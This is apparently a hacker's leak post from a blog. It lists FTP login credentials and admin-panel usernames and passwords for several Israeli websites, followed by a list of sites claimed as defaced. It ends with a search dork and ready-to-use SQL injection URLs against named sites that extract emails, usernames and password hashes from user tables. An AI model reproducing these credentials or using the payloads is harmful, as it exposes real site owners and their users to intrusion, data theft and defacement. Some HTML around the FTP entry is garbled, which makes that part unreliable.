Ftp login
ftp://109.226.10.5 <---ftp br="br" ftp:="ftp:" host="without" the="the">ftp port 21
ftp user likudnikpanel
ftp pass likudnik555!
Admin Login
http://eifo.co.il/admin/login.php admin:1
http://www.jeeps.co.il/admin/Login.php moreless:miki
http://www.a-uzan.co.il/admin yair:4026
http://gbm3d.co.il/admin/ gabriel:gbm3d
http://www.cuponofesh.co.il/admin.php inact12:pi5060
Defaced
http://www.pro-f.co.il/nir/yalla/
http://www.pro-itnow.com/templates/beez/tmp/
http://symptom.co.il/
http://www.myfamilystory.co.il/data/
http://sex.bee.co.il/
http://aboveall.co.il/index.html
http://abh.co.il/index.html
http://www.oram.co.il/index.html
http://alimi.co.il/index.html
http://cleaner.co.il/index.html
http://dolev5.co.il/index.html
http://energyon.co.il/index.html
http://eztalk.co.il/index.html
http://galgalhatzala.co.il/index.html
http://goldencoffee.co.il/index.html
http://greentop.co.il/index.html
http://hazorea.co.il/index.html
http://mbarzilay.co.il/index.html
http://nkh.co.il/index.html
http://status-ltd.co.il/index.html
http://tnn.co.il/index.html
http://trt.co.il/index.html
http://yanuv.co.il/index.html
http://gmast.com/index.html
http://frigordeadsea.com/index.html
http://lillytech.com/index.html
http://inter-deal.net/index.html
http://hadad-diamonds.com/index.html
Vuln
israel CMS SQLi vuln
Dork: intext:"SuperShop v.9.0"
Demo: http://www.hamazgan.co.il/page.asp?id=-46+union+all+select+1111,(select+group_concat(email,0x3a,username,0x3a,password)+from+shopsettings),1111,1111,1111,1111--
PS:password's hashed need to crack
http://purim.org.il/index.php?option=com_bookflip&book_id=-9999+UNION+SELECT+1%2Cconcat%28email%2C0x3a%2Cusername%2C0x3a%2Cactivation%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%
2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37
from jos_users limit 9,1--+-
http://b-2.co.il/index.php?option=com_bookflip&book_id=-9999+UNION+SELECT+1%2Cconcat%28username%2C0x3a%2Cactivation%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37 from jos_users--+-
http://kippur.co.il/index.php?option=com_bookflip&book_id=-9999+UNION+SELECT+1%2Cconcat%28username%2C0x3a%2Cactivation%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37 from jos_users--+- ---ftp>
SOURCE
0 comments:
Posting Komentar